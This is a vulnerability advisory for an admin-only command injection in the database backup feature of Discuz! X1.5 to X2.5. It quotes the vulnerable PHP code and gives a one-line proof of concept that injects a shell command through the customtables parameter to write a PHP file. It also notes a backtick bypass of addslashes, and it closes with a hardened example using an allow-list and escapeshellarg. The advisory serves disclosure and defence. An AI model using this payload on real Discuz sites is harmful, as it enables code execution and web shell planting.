Discuz! X1.5 to X2.5's database backup function in file source/admincp/admincp_db.php allows remote attackers to execute arbitrary PHP code.
Source: https://github.com/FoolMitAh/CVE-2018-14729/blob/master/Discuz_backend_getshell.md
Description
Discuz! X1.5 to X2.5's database backup function in file source/admincp/admincp_db.php allows remote attackers to execute arbitrary PHP code.
VulnerabilityType Other
Remote Code Execution
Vendor of Product
Tencent
Affected Product Code Base
Discuz X1.5 - X2.5
Attack Type
Remote
Impact Code execution
true
Attack Vectors
Administrative Privileges Required
Has vendor confirmed or acknowledged the vulnerability?
true
Discoverer
[email protected] Tech
Detail
Take DiscuzX2.5 for example
```php
// source/admincp/admincp_db.php

# line 296
@shell_exec($mysqlbin.'mysqldump --force --quick '.($db->version() > '4.1' ? '--skip-opt --create-options' : '-all').' --add-drop-table'.($_GET['extendins'] == 1 ? ' --extended-insert' : '').''.($db->version() > '4.1' && $_GET['sqlcompat'] == 'MYSQL40' ? ' --compatible=mysql40' : '').' --host="'.$dbhost.($dbport ? (is_numeric($dbport) ? ' --port='.$dbport : ' --socket="'.$dbport.'"') : '').'" --user="'.$dbuser.'" --password="'.$dbpw.'" "'.$dbname.'" '.$tablesstr.' > '.$dumpfile);

# line 281
$tablesstr = '';
foreach($tables as $table) {
    $tablesstr .= '"'.$table.'" ';
}

# line 143
$tables = & $_GET['customtables'];
```
The argument $tablesstr is built directly from $_GET['customtables'] and passed to shell_exec(), so an administrator-level attacker can easily control it and execute arbitrary commands.
POC
change customtables[] = pre_common_admincp_cmenu">aaa; echo '<?php phpinfo(); ?>' > phpinfo.php #
Additional Information
Discuz 1.5 - 2.0
$tables = $_G['gp_customtables']
The value is escaped with addslashes(), but the injection still works using backticks, e.g. `whoami`.
Discuz 3.0 - 3.4
The developers introduced a bug that makes the database backup feature stop working. However, the vulnerable code is still there.
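As an added example (not code from this advisory or from Discuz!), here is how the table-list construction from line 281 can be hardened: check each requested name against the database's real tables and shell-quote it with escapeshellarg() instead of wrapping it in double quotes. The names buildTablesArg and $knownTables are assumptions, and the sample data is constructed.

```php
<?php
// Added example, not Discuz! code: hardened version of the $tablesstr
// construction behind the shell_exec() call in admincp_db.php.
// $knownTables is assumed to come from a prior SHOW TABLES query.

function buildTablesArg(array $tables, array $knownTables): string
{
    $parts = [];
    foreach ($tables as $table) {
        // 1. Allow-list: only names that actually exist in this database.
        //    Strict comparison so numeric-looking input cannot match loosely.
        if (!is_string($table) || !in_array($table, $knownTables, true)) {
            throw new InvalidArgumentException('unknown table: ' . $table);
        }
        // 2. Defence in depth: shell-quote even allow-listed names.
        //    escapeshellarg() wraps the value in single quotes and escapes
        //    embedded quotes, so ", ;, >, # and backticks lose their shell
        //    meaning. addslashes() (used in 1.5 - 2.0) only adds backslashes
        //    and does not stop backtick command substitution.
        $parts[] = escapeshellarg($table);
    }
    return implode(' ', $parts);
}

// Constructed sample data: two real tables, one benign and one hostile request.
$knownTables = ['pre_common_admincp_cmenu', 'pre_common_member'];
$benign  = ['pre_common_member'];
$hostile = ['pre_common_admincp_cmenu"; whoami #'];

echo 'benign request -> ', buildTablesArg($benign, $knownTables), "\n";

try {
    buildTablesArg($hostile, $knownTables);
} catch (InvalidArgumentException $e) {
    echo 'hostile request rejected: ', $e->getMessage(), "\n";
}

// For comparison, what the original line 281 produced for the hostile value
// (unsafe; shown only to illustrate why double quotes are not a boundary):
//   '"' . $table . '" '  gives  "pre_common_admincp_cmenu"; whoami #"
```

Logging the rejected request (table name, admin account, source IP) gives the SOC a clean detection signal, since legitimate backups never contain shell metacharacters in table names.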